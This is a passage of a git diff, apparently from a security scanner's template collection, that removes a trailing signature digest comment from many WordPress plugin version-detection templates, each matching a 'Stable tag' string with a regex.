a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210096e543992870e6945f697528ab36f06b0ad8002ab46d57a4ced73959acbf08ad0220351d4e929c0c499d09fe3d73051ed7bbb12a9b8d445a0469ef517c2392e67259:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index f8258c0c34..0ae2f18122 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c78a37298c87c0d45001e553d77a5eb8bee8aa4c3eac871e25db8f0aa9d6766b022025c3b05b728c358f92cf850f7150cbdf7b177d6d41bb4f4d419493eb924bf1c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 2b4d958f44..12f549d536 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022049110991c61986e598239a6eb54c20258e6a33977b52f5893eb1d98a2fcf441e022100bd2837075aeb0fea4a7db491593620cd542b08dd4d38acb4ee65015f4b23e3d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 3738a37213..d8ea6a72f1 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d2eb9074389e54c21c1051449f589283003de549794593aa583aa6b91b8f85f1022100ab75b7e25fc44771b9e913fa52f106f35c841ed2f95447cdbc0af9812af004ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index add2c61c4a..4afaf9dc97 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220165a375f89f64c2a8ce37889202148d404925f5edeea9fe7ca87e2e57a49362c0220366b2938eb0a470ed98acba13c06a49c046cb6776ca0bd611cd8deaf948f885b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 37ca294f3d..88fea67f93 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100feadbd8352ce6f678113ea88be1581d5c31e509880995fc38911b50adf65d26402206cd80a677c6a2b1b22345f56ff9dda8a3de3031eebe647fea9db7ee0e2dac02d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index c316bea25d..d205cdbf36 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022042a843d719dd0ef2bc9531132d80fbf6edcc9cf08f769d40a67de874262dd17102202d44541bb93e95482eb0345fda58967fe15196d2c821844c62cd4125793ebc0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 064ce6e333..3fa20df7d2 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c2f8ec633d8a483cf99e5dde67bf6a56bc60bbf3bb271917bee855a6cfa55bd1022100cbda6cee4d5b06fdb63d00e2f5e344494d5cde4fbbcbdbae8ece5ab1690079e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index f8f0ed20cf..bcd63ced86 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022012ff54bf4da5747ea34a4f62f1dfddb621c4dcce6db3e615531933bac0cb0c6e02210096dd50286b2887f035beb1ca9e559bee0bac5f8d3088b95355986b93bb93e91c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index ccc9bc278a..bca0326f2b 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100972f98b31fc7cfbcafdf469b3bbc5cd13bd3c6eaa3240afa0d7510a910ad3a71022100bb3590bbb932ac7cf6b54076c5f804fb1ba6eb45c7ee01cfa9188ac63a5708df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index eb2f8aa5a1..854328f04b 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207cb5c4453effb67ef13e80f0235a3c16a6ece5e8aea5a8351e0b62334416bad8022100bbad75aff03eb006599eccab5dd8d00222770f744288daeecd540da76970e47a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 2d50fea0e6..6d3f7f4566 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100af0166691b0fcf0715434aaa303914e26ad1f6bd6f85db06f75eada9b9c2e6ca02207030a2df6a95f8886f7f1d825c9a879c6230adaa65af24414e6a99bfab298b3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index 97c5f1561c..a923d21a15 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e230e672a769463e1709fcf6bc701c871cbfd387bff057bf5721601d927a46b50220244377928b84f545b0230195d54a4ea052ee715ba19b07a9e9c19b406813fa69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 8dcb3aaa8c..f10480fc8f 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dc214e0dd89cf1561591081cc4a7e658fac030d9cf532336e7a4e2427b5342a9022051f0ec327508bebaac76edfb96f2bcbc5555cf26dc13ffab90a47d419ee4ab2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 9138370679..6c92091767 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200ca03d4fb34789fec3ee6b33fa401b6466a633babf69fb8960eb2c146c1556f50220400a3744d23be074d43c5041f88cde6c16ecf8ea6564642a4cd1c3a469fcb7bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b4ad2c6ae3..b25c6c9a9c 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200f88bf63e43a73ad68419bd8985db449f37f8ce28dbc4a3506647c55f09462d6022100f63886e08cd0047d80addc3ab1c582f152938372dc9af72dcaac498371bd4dbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index cd1b13bec2..1781172d05 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a5d6ba75c9de4d55d1d6d97f6bce3aa8a42f00ea4aa3221f764f1ef42d8c28a7022100adfe61c2c7f413cff541b7cd474bd7f92cf96ba574ef9d70a72a0f19754bc0ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 83c58198ba..92c8ce3409 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b991880c6c055dd1539e6d628e23b8de116996ba57f63de8782230676ef1b226022100f50bb35db2ac127d1cb923b208599e73de5581ac37905fce00f1c9c104c8311d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 64797210cf..eea42ed8da 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f5e7b474cb68615e35d0e04fea9fbc9657de322f74294be3f36d19df67947ac1022012a71739daa6d3062bed9f36db3378c83f828cda969666c8c1d1135bbb80482d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index 68db771d7f..bedb85a0eb 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022019b65cde5e1cdf4275990ec3d5f4327336cf6b5c18157b9fc349992e7c628d58022041cf706f591c2d1ecf820948ef9184e047ae7f15e2c4059587c122fdf8597382:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 9b39d4a095..45bbbc71df 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022043cf789668a8c7ae557065aacf8387eb71c06c347980fe85bee4290b6c6e17430220391522378d08493da5bb203f9f704c0fead91274c693c81c01708562300ec31f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 5f24a1820e..03befac73e 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206f87c76b899dcb80165cec7cd2de2d17e9afc84d5bf5de27c1265564276567f0022100b2a26bc7789343be895a2abe1ec40c0bb8686b4e28bb775142ee02da9ff14d84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 66ee4af24e..e1f0093127 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022051a1f6b528f16ac7def9c66b617064851f094be94c11c45fad3b1ed3d997b78102203bbc84c4ce0f9d537d31d282cd17fdb2a67d338e00e12ed1e94b1b722b2bd963:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index f104fa4c0f..0db316d66d 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202c2303acd891c8ceb383ff8029fc4e679a78c5ae533b12364077ebe0505c1629022065d438afefad58bed1a082ebc42103e64f33e2baee26b0e01f41fb502463b54c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 3833413b97..135639253d 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204f2e2f6c8239fe67d7bae70f9a7cadb1a473250ecc48f081667e6a81d94f82c8022025377ad01446fcd5abef4f71a55ad0439189874cd25bd0819ce9e8fc7ac9b8ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 7ad489f6d7..540fbaf9ac 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220180368bde179e8a71b439f26a6fba549825bf3267312afd2da31753e0cf674f70220647a1c5586633b0ed2f0e8826c66b77be9c7a67930a0932aeb570b39295c41c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index c59c8d8361..7e71b4736f 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022055ed4a4145d1b2fec5467852e10b1aa7ac4e83453a06d662759f72e29b441e44022100d2f4ea912075bd288e1f14b5848fee4bd0941ba063d96ede2fe03ecd2b74d46f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 0d24e97726..88a70b2478 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bf0823e443d5e439f3b62ba9cdc76363bf7d49cf879473142a2b2c1108e765f0022100d7844dae997d9d9c877395208779694a845cc4c49685036861208145b54a61ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 16eace3dd7..fc498e67e6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220763a7412fa00a262d3523c80ab27c364b40a6f6c9899f62e55248b5c2eaf23f802204fea8878154e26eb08f6ba9307d72344a5fee5d2900702eb1f4e1cbaaeba701f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 7a1060136e..465aa93d57 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205a4f176a828dfb99c8345dd560068ee926439585c5fa4020d2da3806e6f3e8a10221008d71121b641367d4cefa8516a2b56f5550089feb02c0431de4669372b7d6db60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 6b0f120772..2a1b0e57a9 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202ceb36de8b2df0a595ac7ebd38728f7ee467e5dd1a82df6d450723304b299ddb022026dcbd3b4ffe5e822a2d0cbce3bd0f551ca82ef6e533afd78b3ed442df90b476:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 1b42794836..df35e8b415 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210099bfd8211618fd711d3836ac194c174a86ce2970c033a8ce724e9a816d3f97210220423b6feffe83a1ad1a336e3dc46ec86ab35046052f1d71810d309e6fb0c3a742:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index dd20d526f0..033cc4bc3d 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ec4a7ddb6a15827881f3869f3553790dcb3172da477b5c9e8553f93e76939f7702207b35c44bdcaa09cb1d3e4101c311c43cd37963dd0b8bcfc7cb762e2814880552:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 00f34d62d0..945ab6ad03 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e9ad911ec66c461ae2eac637479aab1d277e8ce5285c88ab21ea5fd622269fde0220778d0b81bea568732130dfe287939f9c99942f26e839409a35610fff332e67ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 60805981f4..2072b51ab9 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022019fcf70af688164d9295599d434d4efa933a62ee66a5467afb8fafcc94ff3fa802210098a670d1f8a60cdb704f34aabc198027777f98d366eb7fe6e22431a1689573b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 0ccea350fa..b509d8cc67 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200f6020f389ea6134cde1434cab6aa6f59b735b65314923af1d82933075c0f0db022014f16d038b8da236c3843576de64d50665af4ee3a04f737955cb68e0348b2d99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 568f634ddd..c984479bde 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210090327269e4198a022aa22531de559097eb25eb9f78348c00c82f0994b94a44df022031f59feb8e1bd6d22fbeabb786d479c9bf50790a25dc5996eeeced9189ceb32d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index c6e1c3ab2f..a3870175c7 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205dd37766535e8c0791b92158760410ef21077ba4a94af18a48290538a7a0b6c6022100b33c3d3ee3aed377e628335b033a05feb0353be4ed24c19f0a12decabf7749b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index cbe302eba1..f5f3818ea2 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205ab70cd73fc5826d1c79fecf28dfaf68a5c29c9b57ecc69253325952f7b7e15d02207d4314e3223e32d4cf66773de8d4ea3202c7dcf9b02bf8b80f8b77f94503a40d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 569881a071..7e5b54c12c 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d8c9990b430b6dc9bc816fe5fda3fedcbd2d68544a7d5673440db389b2ca759a022100c28b972d556fea54b8b36ea7f03b4202a83b4932c60eab733f4cac688db7424f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 0bd645902f..59effd09f6 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202fcc3a8ee47d80ca1775a5ac5f6e42bc4d2042889598d1a87a0cfeba6e5c80bc0220400e1674b1866de0e377c61a6e3d544d8f78f732c4a0dc873a16be628158efc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 364cc75d73..833207dcff 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207eea441a69a2b4e70e2ab4af28e9ddcf5dfcf4c0c10755ef77960608294c361a0220677cef534e4b7cb33f894856df1b0809346be20e4cd5374ed7b6e6952b57bc98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 0ddccb7a15..b7ea2d38d1 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009fa2767e64125df2f9534b8eb8ced3c08b2719003c7d8453849c6a2dcb7414d20220324a168249cbd7fadb928f6086f8e5ad25e7012efcb532cadb20accecb1d84f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 11dddce541..2131dbe751 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220718441e2d13d56d8ed7b396511f0f26c1585909f00184df1fc7d8271a908cb3a0220401000388a5a7437addc6df3a5b2b9e9d35cdbe21c1a427cc7cad3204b7953ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 2d7fba2475..73d644c5e4 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204ba679cf1e88906414c822d21fd76d4389832800de10ffc3654b3fdc60d2b603022100dfe2e5766433e5da11c2ba9587351b0acead868f27713561cf6611bfc6cfb874:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 1c73839364..7b0593dcb7 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200962734625332f35d38a7d890c3f25e3c7ba40f1635b50105fa0c5bae830ea2a022100e2a8b18164ea4b2d22d8169e4730bfc760d94de40350841054ba92349c2211f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 292cfe61bb..6f65d087e4 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f4a258898eb2b8aacef7790b6c3d65ce40c306ddaff0a662bc392e98300bf4fb02201a91b7a55123b324850c2773db6ecc835c79e86d587ca1ff339f1d81918384f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 